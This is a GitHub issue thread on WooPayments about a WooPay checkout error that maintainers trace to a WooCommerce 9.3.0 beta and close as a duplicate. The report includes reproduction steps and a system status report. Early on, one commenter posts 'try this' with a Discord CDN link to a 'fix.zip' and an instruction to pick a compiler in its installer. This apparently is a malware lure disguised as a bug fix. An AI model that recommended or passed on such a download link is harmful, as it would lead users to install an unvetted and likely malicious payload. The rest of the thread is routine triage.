### ISSUE TITLE
[GlobalStep] "There was an error processing the order. Please go back to the merchant store and try again." error is display after clicking on the "Place Order" button on the "Woopay checkout" page.

### ISSUE THREAD

**Issue by gglobalstep** [Automattic/woocommerce-payments#9375] opened 2024-09-03 13:00 UTC
### Describe the bug
"There was an error processing the order. Please go back to the merchant store and try again." error is display after clicking on the "Place Order" button on the "Woopay checkout" page.

### Environment:
Woocommerce Version: 9.3.0.30
WooCommerce Payments:  8.2.0-test-2
WordPress version: v6.6.1

PC:
Windows 10
Chrome (Version 128.0.6613.120)
Firefox (Version 129.0.2)

### To Reproduce
1. Create a test site.
2. Install and activate the Woocommerce version 9.3.0.30 plugins.
3. Upload and activate the WooCommerce Payments v8.2.0-test-2 plugin.
4. Complete the setup wizard.
5. Complete the KYC flow.
6. Merchant account must be US-based.
7. WooPay must be enabled at checkout (Via WooCommerce > WooPayments Settings > Express checkouts).
8. WooPay must be enabled on the product page (Via WooCommerce > WooPayments Settings > Express checkouts > WooPay > "Customize").
9. As a customer, navigate to a product page for a product (any kind of product should work: simple, variable, virtual, subscription).
10. Click "Buy with WooPay" next to the "Add to cart" CTA.
11. Customer should be redirected to the WooPay checkout page and presented with a login form. Note: If you click the button very quickly after page load you will get the OTP modal to complete the email and OTP steps and then get redirected.
12. Enter a new email address into the "sign up" email field, click "Continue".
13. Enter a valid phone number, click "verify your account".
14. Enter the OTP code you received on the phone number previously entered.
15. The full checkout form should now load.
16. Fill in the details for the shipping address, card details.
17. Click "Place order"
18. Observe that, "There was an error processing the order. Please go back to the merchant store and try again." error is display.

### Note: 
 Issue observed without WooCommerce beta plugin.

### Instruction Link
https://github.com/Automattic/woocommerce-payments/wiki/Testing-instructions-for-critical-flows#woopay-checkout

### Actual behavior
"There was an error processing the order. Please go back to the merchant store and try again." error is display after clicking on the "Place Order" button on the "Woopay checkout" page.

### Expected behavior
Order should be placed after clicking on the "Place Order" button on the "Woopay checkout" page.

### Screenshots
![image (4)](https://github.com/user-attachments/assets/b4f7df14-426b-47a0-aeda-c526027ad4bd)

<details><summary>System Status Report</summary>

```
### WordPress Environment ###

WordPress address (URL): [Redacted]
Site address (URL): [Redacted]
WC Version: 9.3.0.30
Legacy REST API Package Version: The Legacy REST API plugin is not installed on this site.
Action Scheduler Version: ✔ 3.8.1
Log Directory Writable: ✔
WP Version: 6.6.1
WP Multisite: –
WP Memory Limit: 512 MB
WP Debug Mode: –
WP Cron: ✔
Language: en_US
External object cache: ✔

### Server Environment ###

Server Info: nginx
PHP Version: 8.1.29
PHP Post Max Size: 2 GB
PHP Time Limit: 1200
PHP Max Input Vars: 6144
cURL Version: 8.7.1
OpenSSL/3.0.11

SUHOSIN Installed: –
MySQL Version: 10.6.18-MariaDB-log
Max Upload Size: 2 GB
Default Timezone is UTC: ✔
fsockopen/cURL: ✔
SoapClient: ✔
DOMDocument: ✔
GZip: ✔
Multibyte String: ✔
Remote Post: ✔
Remote Get: ✔

### Database ###

[REDACTED]

### Post Type Counts ###

attachment: 24
page: 9
post: 2
product: 24
product_variation: 7
revision: 7
shop_coupon: 4
shop_order_placehold: 101
wp_navigation: 1

### Security ###

Secure connection (HTTPS): ✔
Hide errors from visitors: ✔

### Active Plugins (6) ###

Akismet Anti-spam: Spam Protection: by Automattic - Anti-spam Team – 5.3.3
Code Snippets: by Code Snippets Pro – 3.6.5.1
Query Monitor: by John Blackbourn – 3.16.4
WooPayments: by WooCommerce – 8.2.0-test-2
WooCommerce Subscriptions: by WooCommerce – 6.6.1
WooCommerce: by Automattic – 9.3.0.30

### Inactive Plugins (2) ###

Jetpack: by Automattic – 13.7
WooCommerce Payments Dev Tools: by Automattic –

### Dropin Plugins () ###

advanced-cache.php: advanced-cache.php
db.php: Query Monitor Database Class (Drop-in)
object-cache.php: Memcached

### Must Use Plugins (1) ###

load.php: by  –

### Settings ###

Legacy API Enabled: –
Force SSL: –
Currency: USD ($)
Currency Position: left
Thousand Separator: ,
Decimal Separator: .
Number of Decimals: 2
Taxonomies: Product Types: external (external)
grouped (grouped)
simple (simple)
subscription (subscription)
variable (variable)
variable subscription (variable-subscription)

Taxonomies: Product Visibility: exclude-from-catalog (exclude-from-catalog)
exclude-from-search (exclude-from-search)
featured (featured)
outofstock (outofstock)
rated-1 (rated-1)
rated-2 (rated-2)
rated-3 (rated-3)
rated-4 (rated-4)
rated-5 (rated-5)

Connected to WooCommerce.com: –
Enforce Approved Product Download Directories: ✔
HPOS feature enabled: ✔
Order datastore: Automattic\WooCommerce\Internal\DataStores\Orders\OrdersTableDataStore
HPOS data sync enabled: –

### Logging ###

Enabled: ✔
Handler: Automattic\WooCommerce\Internal\Admin\Logging\LogHandlerFileV2
Retention period: 30 days
Level threshold: –
Log directory size: 6 MB

### WC Pages ###

Shop base: #5 - /shop/
Cart: #6 - /cart/ -  Contains the woocommerce/cart block
Checkout: #7 - /checkout/ -  Contains the woocommerce/checkout block
My account: #8 - /my-account/
Terms and conditions: ❌ Page not set

### Theme ###

Name: Storefront
Version: 4.6.0
Author URL: https://woocommerce.com/
Child Theme: ❌ – If you are modifying WooCommerce on a parent theme that you did not build personally we recommend using a child theme. See: How to create a child theme
WooCommerce Support: ✔

### Templates ###

Overrides: –

### WooPayments ###

Version: 8.2.0-test-2
Connected to WPCOM: Yes
WPCOM Blog ID: 236620373
Account ID: acct_1PuqI2C213EqoU7U
Payment Gateway: Enabled
Test Mode: Enabled
Enabled APMs: card
WooPay: Enabled (product,cart,checkout)
WooPay Incompatible Extensions: No
Apple Pay / Google Pay: Enabled (product,cart,checkout)
Fraud Protection Level: basic
Multi-currency: Enabled
Auth and Capture: Enabled
Documents: Disabled
Logging: Enabled

### Subscriptions ###

WCS_DEBUG: ✔ No
Subscriptions Mode: ✔ Live
Subscriptions Live URL:
Subscriptions-core Library Version: 7.4.2
Subscription Statuses: wc-active: 11
wc-cancelled: 1

WooCommerce Account Connected: ❌ No
Report Cache Enabled: ✔ Yes
Cache Update Failures: ✔ 0 failure

### Store Setup ###

Country / State: United States (US) — California

### Subscriptions by Payment Gateway ###

WooPayments: wc-active: 11
wc-cancelled: 1


### Payment Gateway Support ###

WooPayments: products
refunds
multiple_subscriptions
subscription_cancellation
subscription_payment_method_change_admin
subscription_payment_method_change_customer
subscription_payment_method_change
subscription_reactivation
subscription_suspension
subscriptions
subscription_amount_changes
subscription_date_changes
tokenization
add_payment_method


### Admin ###

Enabled Features: activity-panels
analytics
product-block-editor
coupons
core-profiler
customize-store
customer-effort-score-tracks
import-products-task
experimental-fashion-sample-products
shipping-smart-defaults
shipping-setting-tour
homescreen
marketing
mobile-app-banner
navigation
onboarding
onboarding-tasks
pattern-toolkit-full-composability
product-custom-fields
remote-inbox-notifications
remote-free-extensions
payment-gateway-suggestions
printful
shipping-label-banner
subscriptions
store-alerts
transient-notices
woo-mobile-welcome
wc-pay-promotion
wc-pay-welcome-page
launch-your-store

Disabled Features: product-data-views
experimental-blocks
minified-js
product-pre-publish-modal
settings
async-product-editor-category-field
product-editor-template-system
blueprint
reactify-classic-payments-settings

Daily Cron: ✔ Next scheduled: 2024-09-04 06:22:20 +00:00
Options: ✔
Notes: 61
Onboarding: skipped

### Action Scheduler ###

Complete: 619
Oldest: 2024-09-03 06:24:00 +0000
Newest: 2024-09-03 07:37:03 +0000

Pending: 15
Oldest: 2024-09-03 12:54:57 +0000
Newest: 2024-11-03 07:38:19 +0000

Failed: 1
Oldest: 2024-09-03 06:31:49 +0000
Newest: 2024-09-03 06:31:49 +0000

Canceled: 26
Oldest: 2024-09-03 06:44:29 +0000
Newest: 2024-09-03 10:18:42 +0000


### Status report information ###

Generated at: 2024-09-03 12:54:31 +00:00
```
</details>

**Comment by Dominic54321** [comment] 2024-09-03 13:04
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by haszari** [comment] 2024-09-04 21:58
Added `woopay` focus. This looks serious at face value, so adding `high` priority. FYI @c-shultz

**Comment by haszari** [comment] 2024-09-04 22:04
Possibly a regression of  https://github.com/Automattic/woocommerce-payments/issues/9345 ?

FYI @alefesouza @rodelgc 

> @htdat: Woocommerce Version: 9.3.0.30; the latest stable version is 9.2.3

Possibly an interaction with prerelease WooCommerce?

**Comment by htdat** [comment] 2024-09-05 05:02
> > Woocommerce Version: 9.3.0.30; the latest stable version is 9.2.3
> 
> Possibly an interaction with prerelease WooCommerce?

Turns out that this is the internal version number of 9.3.0-beta-1 release - pbPjnJ-2kL-p2 and that's the same with https://github.com/Automattic/woocommerce-payments/issues/9345

I am trying to test this and confirm that this issue does not exist with 9.3.0-rc-1 https://github.com/woocommerce/woocommerce/releases/tag/9.3.0-rc.1

All is good so I am closing this issue as marking it as duplicate.

**Comment by htdat** [comment] 2024-09-05 05:02
gg

**Closed as completed by htdat** 2024-09-05 05:02 UTC
Labels: category: duplicate, focus: woopay, Bug
